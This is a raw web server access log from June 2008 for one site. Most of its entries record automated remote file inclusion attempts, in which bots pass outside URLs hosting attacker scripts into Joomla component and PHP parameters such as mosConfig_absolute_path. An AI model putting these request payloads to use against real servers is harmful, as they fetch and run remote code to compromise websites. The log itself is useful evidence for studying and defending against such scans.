213.80.152.210 - - [25/Jun/2008:11:44:21 -0700] "GET /logs/access.log//components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:23 -0700] "GET //components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:26 -0700] "GET /logs/access.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:26 -0700] "GET /logs/access.log//components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:26 -0700] "GET /logs//components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.62.227 - - [25/Jun/2008:11:44:27 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:28 -0700] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:28 -0700] "GET //components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:31 -0700] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:35 -0700] "GET /logs//components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:40 -0700] "GET /logs/access.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.62.227 - - [25/Jun/2008:11:44:41 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:43 -0700] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:44:46 -0700] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.62.227 - - [25/Jun/2008:11:44:59 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 428800 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.32.73.179 - - [25/Jun/2008:11:45:12 -0700] "GET /logs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=7&GLOBALS=&mosConfig_absolute_path=http://www.sarmotiworld-fanclub.com/picturez/pictures/Pics_2007/rnd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
216.32.73.179 - - [25/Jun/2008:11:45:12 -0700] "GET /logs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=7&GLOBALS=&mosConfig_absolute_path=http://www.sarmotiworld-fanclub.com/picturez/pictures/Pics_2007/rnd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
216.32.73.179 - - [25/Jun/2008:11:45:12 -0700] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=7&GLOBALS=&mosConfig_absolute_path=http://www.sarmotiworld-fanclub.com/picturez/pictures/Pics_2007/rnd.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
216.32.73.179 - - [25/Jun/2008:11:45:13 -0700] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=7&GLOBALS=&mosConfig_absolute_path=http://www.sarmotiworld-fanclub.com/picturez/pictures/Pics_2007/rnd.txt??? HTTP/1.1" 200 50 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:45:29 -0700] "GET /logs/access.log//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:45:32 -0700] "GET /logs/scanhttp://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:45:32 -0700] "GET //components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:45:35 -0700] "GET /scanhttp://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:45:38 -0700] "GET /logs//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:45:42 -0700] "GET /logs/access_080117.log/index.php?pg=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:45:44 -0700] "GET /index.php?pg=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:45:45 -0700] "GET /logs/index.php?pg=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:11:45:45 -0700] "GET /logs/access_080120.log/config.php?path_to_root=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:45:57 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:45:57 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:45:57 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:46:10 -0700] "GET //components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:46:22 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:46:32 -0700] "GET /logs/access.log/index.php?pag=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:46:34 -0700] "GET /index.php?pag=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 18381 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:46:34 -0700] "GET /logs/index.php?pag=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:46:52 -0700] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:47:01 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:47:01 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:47:01 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:47:04 -0700] "GET //components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:47:05 -0700] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:11:47:23 -0700] "GET /tmp/?N=D HTTP/1.0" 200 1502 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:47:38 -0700] "GET //components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:47:51 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:47:58 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:47:59 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:47:59 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:47:59 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:47:59 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:11:48:00 -0700] "GET /logs/access_080212.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.86.64 - - [25/Jun/2008:11:48:10 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:19 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:20 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:20 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:20 -0700] "GET /logs/phphtml.php?htmlclass_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:20 -0700] "GET /logs/phphtml.php?htmlclass_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:48:26 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:32 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:33 -0700] "GET /logs/phphtml.php?htmlclass_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [25/Jun/2008:11:48:42 -0700] "GET /logs/access.log/index.php?url=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:43 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:43 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [25/Jun/2008:11:48:44 -0700] "GET /index.php?url=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt?? HTTP/1.1" 200 18489 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.54.120 - - [25/Jun/2008:11:48:45 -0700] "GET /logs/index.php?url=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:48:49 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:48:53 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:49:05 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:49:11 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:49:23 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:49:24 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:49:24 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:49:26 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:49:40 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:49:44 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:11:49:47 -0700] "GET /logs/access_071226.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:11:49:48 -0700] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:11:49:52 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.118.97.213 - - [25/Jun/2008:11:49:52 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:11:49:52 -0700] "GET /logs/access_080120.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:11:49:53 -0700] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.203.247 - - [25/Jun/2008:11:49:53 -0700] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [25/Jun/2008:11:49:53 -0700] "GET /logs/access_080102.log/modifyform.html?code=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [25/Jun/2008:11:49:54 -0700] "GET /logs/modifyform.html?code=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.129.128.75 - - [25/Jun/2008:11:50:04 -0700] "GET /logs/?custompluginfile[]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 200 53419 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
78.129.128.75 - - [25/Jun/2008:11:50:05 -0700] "GET /?custompluginfile[]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 200 18423 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
77.221.130.15 - - [25/Jun/2008:11:50:05 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:50:12 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:50:12 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.82.172 - - [25/Jun/2008:11:50:49 -0700] "GET /logs/config.php?fpath=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.82.172 - - [25/Jun/2008:11:50:49 -0700] "GET /config.php?fpath=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:51:03 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:51:04 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:11:51:04 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:51:04 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.207.104 - - [25/Jun/2008:11:51:04 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:51:04 -0700] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:11:51:08 -0700] "GET /logs/access_071226.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:11:51:08 -0700] "GET //components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:11:51:09 -0700] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:11:51:18 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.120 - - [25/Jun/2008:11:51:18 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:51:21 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:51:35 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:51:35 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:51:35 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.48.31 - - [25/Jun/2008:11:51:47 -0700] "GET //my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:51:48 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:51:48 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:51:49 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:51:49 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:11:51:50 -0700] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:11:51:56 -0700] "GET //Neos_Chronos/header.php?base_folder=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.48.31 - - [25/Jun/2008:11:51:57 -0700] "GET /logs//my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:11:52:01 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
